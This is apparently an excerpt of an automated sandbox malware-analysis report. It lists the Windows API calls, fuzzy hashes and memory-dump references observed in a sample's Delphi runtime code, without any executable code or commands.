                                                                                                              • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                              • Instruction ID: 3efbae91d522e8acb434f660c4dfb3c43025a7791c847afa2b02f3a9f9078594
                                                                                                              • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                              • Instruction Fuzzy Hash: 33B092243C820515FA1826633E007B2004C0B4128AF88B051AF18C80D1FE00C101983A
                                                                                                              APIs
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02E44C57
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeString
                                                                                                              • String ID:
                                                                                                              • API String ID: 3341692771-0
                                                                                                              • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                              • Instruction ID: 2b14e15d6c9d7b46f3a49508217947bb5ad813e25674eb81a6d26f70b3aab079
                                                                                                              • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                              • Instruction Fuzzy Hash: 7CA0245C140313055F07331C101011F11733FC03443CCD0D415044D0404F3540007C34
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02E41A03), ref: 02E415E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: b30bc34a4d56a9abd2b36d9f22482335c3938521e83a8bc939f2f327ba9c6a0a
                                                                                                              • Instruction ID: f2771f649d00499299764ab4772ba1d1558e4662ec75effde1178552e39e9699
                                                                                                              • Opcode Fuzzy Hash: b30bc34a4d56a9abd2b36d9f22482335c3938521e83a8bc939f2f327ba9c6a0a
                                                                                                              • Instruction Fuzzy Hash: E5F04FF0BC13004FDB05CFBAA9543017AE6E78A344F60C579E609DB3C4EB7184428B00
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E416A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: bb754fab10f8bcd42861a921fbce6e611fb1069b5be44fa3e56baa615b44227b
                                                                                                              • Instruction ID: 8943d4fdaa57b61ba19e849684d4231daf2ba4419869c9200abe2d26a5b800e6
                                                                                                              • Opcode Fuzzy Hash: bb754fab10f8bcd42861a921fbce6e611fb1069b5be44fa3e56baa615b44227b
                                                                                                              • Instruction Fuzzy Hash: B0F0B4B2B807956BDB109F9AEC80783BB98FB80314F554579FA0C9B340D770A851CB98
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02E41FE4), ref: 02E41704
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1263568516-0
                                                                                                              • Opcode ID: ea149944f706ca5fa495e159065429b8279a865cdd1df25adee8ed7c8ac5ab19
                                                                                                              • Instruction ID: 945dcab7d11842163e8e2f479a010f78c12894e6bdffdc5e346239c63916c87c
                                                                                                              • Opcode Fuzzy Hash: ea149944f706ca5fa495e159065429b8279a865cdd1df25adee8ed7c8ac5ab19
                                                                                                              • Instruction Fuzzy Hash: D6E026753803006FDF100F7A6C84B026BCCEB45214F249475F508CF242CA60E8508B24
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02E5ADA3,?,?,02E5AE35,00000000,02E5AF11), ref: 02E5AB30
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02E5AB48
                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02E5AB5A
                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02E5AB6C
                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02E5AB7E
                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02E5AB90
                                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02E5ABA2
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02E5ABB4
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02E5ABC6
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02E5ABD8
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02E5ABEA
                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02E5ABFC
                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02E5AC0E
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02E5AC20
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02E5AC32
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02E5AC44
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02E5AC56
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                              • API String ID: 667068680-597814768
                                                                                                              • Opcode ID: 16301d0a1f15d9eff565039a648d85caf66d739e82ae07ce10ed11d026265495
                                                                                                              • Instruction ID: af2d20a187aa5b7b594f9a2f5edf281b7e88a04c0c7eb61650b4f665739195c2
                                                                                                              • Opcode Fuzzy Hash: 16301d0a1f15d9eff565039a648d85caf66d739e82ae07ce10ed11d026265495
                                                                                                              • Instruction Fuzzy Hash: 6631DFB09D07609FEF00EBF5A885A2977ADAB17601750AEB5BC01DF304EB74A495CF12
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45925
                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02E4593C
                                                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02E4596C
                                                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E459D0
                                                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A06
                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A19
                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A2B
                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A37
                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000), ref: 02E45A6B
                                                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14), ref: 02E45A77
                                                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02E45A99
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                              • API String ID: 3245196872-1565342463
                                                                                                              • Opcode ID: ff8cff46548b71ed7f399e0c82dd75e74a17bc5b85319b4ecf6a3bb55045bebd
                                                                                                              • Instruction ID: 827b13d7083c84add1cd302faf341ab85b672ce1a4791bc7fe2b74d2e942be09
                                                                                                              • Opcode Fuzzy Hash: ff8cff46548b71ed7f399e0c82dd75e74a17bc5b85319b4ecf6a3bb55045bebd
                                                                                                              • Instruction Fuzzy Hash: 32417271D80229AFDF10DBE8DC88ADEB3BDAF08344F4499A6A558E7241DB309A44DF54
                                                                                                              APIs
                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E45BE8
                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E45BF5
                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E45BFB
                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E45C26
                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45C6D
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45C7D
                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45CA5
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45CB5
                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E45CDB
                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E45CEB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                              • API String ID: 1599918012-2375825460
                                                                                                              • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                              • Instruction ID: ba546dee17be8bf66c2d13b567e0b8daf5c5750c9f949f0009dd60419375485b
                                                                                                              • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                              • Instruction Fuzzy Hash: 5B31C772E8026C2AEF25DAB4AC45FDE77AD9B04384F4491A1AA08E61C0DF749F848F54
                                                                                                              APIs
                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02E47FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DiskFreeSpace
                                                                                                              • String ID:
                                                                                                              • API String ID: 1705453755-0
                                                                                                              • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                              • Instruction ID: 1f9ab5f00ac4ac6c5ac5536ea8810bdcd51c362d5292059f0998df53349d6f38
                                                                                                              • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                              • Instruction Fuzzy Hash: 7811DEB5E00209AF9B04CF99CC81DAFF7F9FFC9304F54C569A509E7254E671AA018BA0
                                                                                                              APIs
                                                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                              • Instruction ID: f50654008ef816edf25f79f86b2a61a75fb5e8310b3420d361b94665b9391c0c
                                                                                                              • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                              • Instruction Fuzzy Hash: 01E0D87278421417D711A558BC84EF6725D975C310F00D2BAFD05C73C5EDF09E804AE4
                                                                                                              APIs
                                                                                                              • GetVersionExA.KERNEL32(?,02E6D106,00000000,02E6D11E), ref: 02E4B79A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Version
                                                                                                              • String ID:
                                                                                                              • API String ID: 1889659487-0
                                                                                                              • Opcode ID: c5e50f4870e5dfc51d6c2223f87ff41bdc414d90cba7c078d86739b2eaa94425
                                                                                                              • Instruction ID: 0b3b7bf81835930ce9669dff4e4c9b31806bccc6778bd4a562869518144bed92
                                                                                                              • Opcode Fuzzy Hash: c5e50f4870e5dfc51d6c2223f87ff41bdc414d90cba7c078d86739b2eaa94425
                                                                                                              • Instruction Fuzzy Hash: FEF0F9789843018FD340DF2AE44AE1677E9FB44B84F449D28E694C7380EB34E454CB52
                                                                                                              APIs
                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02E4BE72,00000000,02E4C08B,?,?,00000000,00000000), ref: 02E4A823
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                              • Instruction ID: b0212383e23a19f841399ac7de5b390b8b41e12117de103fad13caa69967b0ad
                                                                                                              • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                              • Instruction Fuzzy Hash: D2D05EA238E2602AA210915A3D88DBB5ADCCACA7B1F00907AB988C6201D6118C07DBB1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 481472006-0
                                                                                                              • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                              • Instruction ID: f62645ffff51595bfb5aae4e09081ff0a90df37bd09a968f87f6152c44c4fa4e
                                                                                                              • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                              • Instruction Fuzzy Hash: F7A0128044492041854033181C0253430445851A20FC4C7807CF8402D0ED1D01208093
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02E4D29D
                                                                                                                • Part of subcall function 02E4D268: GetProcAddress.KERNEL32(00000000), ref: 02E4D281
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                              • API String ID: 1646373207-1918263038
                                                                                                              • Opcode ID: e2d3fc563c27f41b0ab6c44778889dd86421a5c1710672106f2118b30ac88911
                                                                                                              • Instruction ID: 075e808649f33da3b6e4e2ebf39d65b0fec21f62b8c1e4b778db786e8aa672d0
                                                                                                              • Opcode Fuzzy Hash: e2d3fc563c27f41b0ab6c44778889dd86421a5c1710672106f2118b30ac88911
                                                                                                              • Instruction Fuzzy Hash: 3E41EFA1AC92085B56186AAE7C02427F79ED784A143F0F55AF808CB754DE24FC92CE6D
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02E56EDE
                                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02E56EEF
                                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02E56EFF
                                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02E56F0F
                                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02E56F1F
                                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02E56F2F
                                                                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02E56F3F
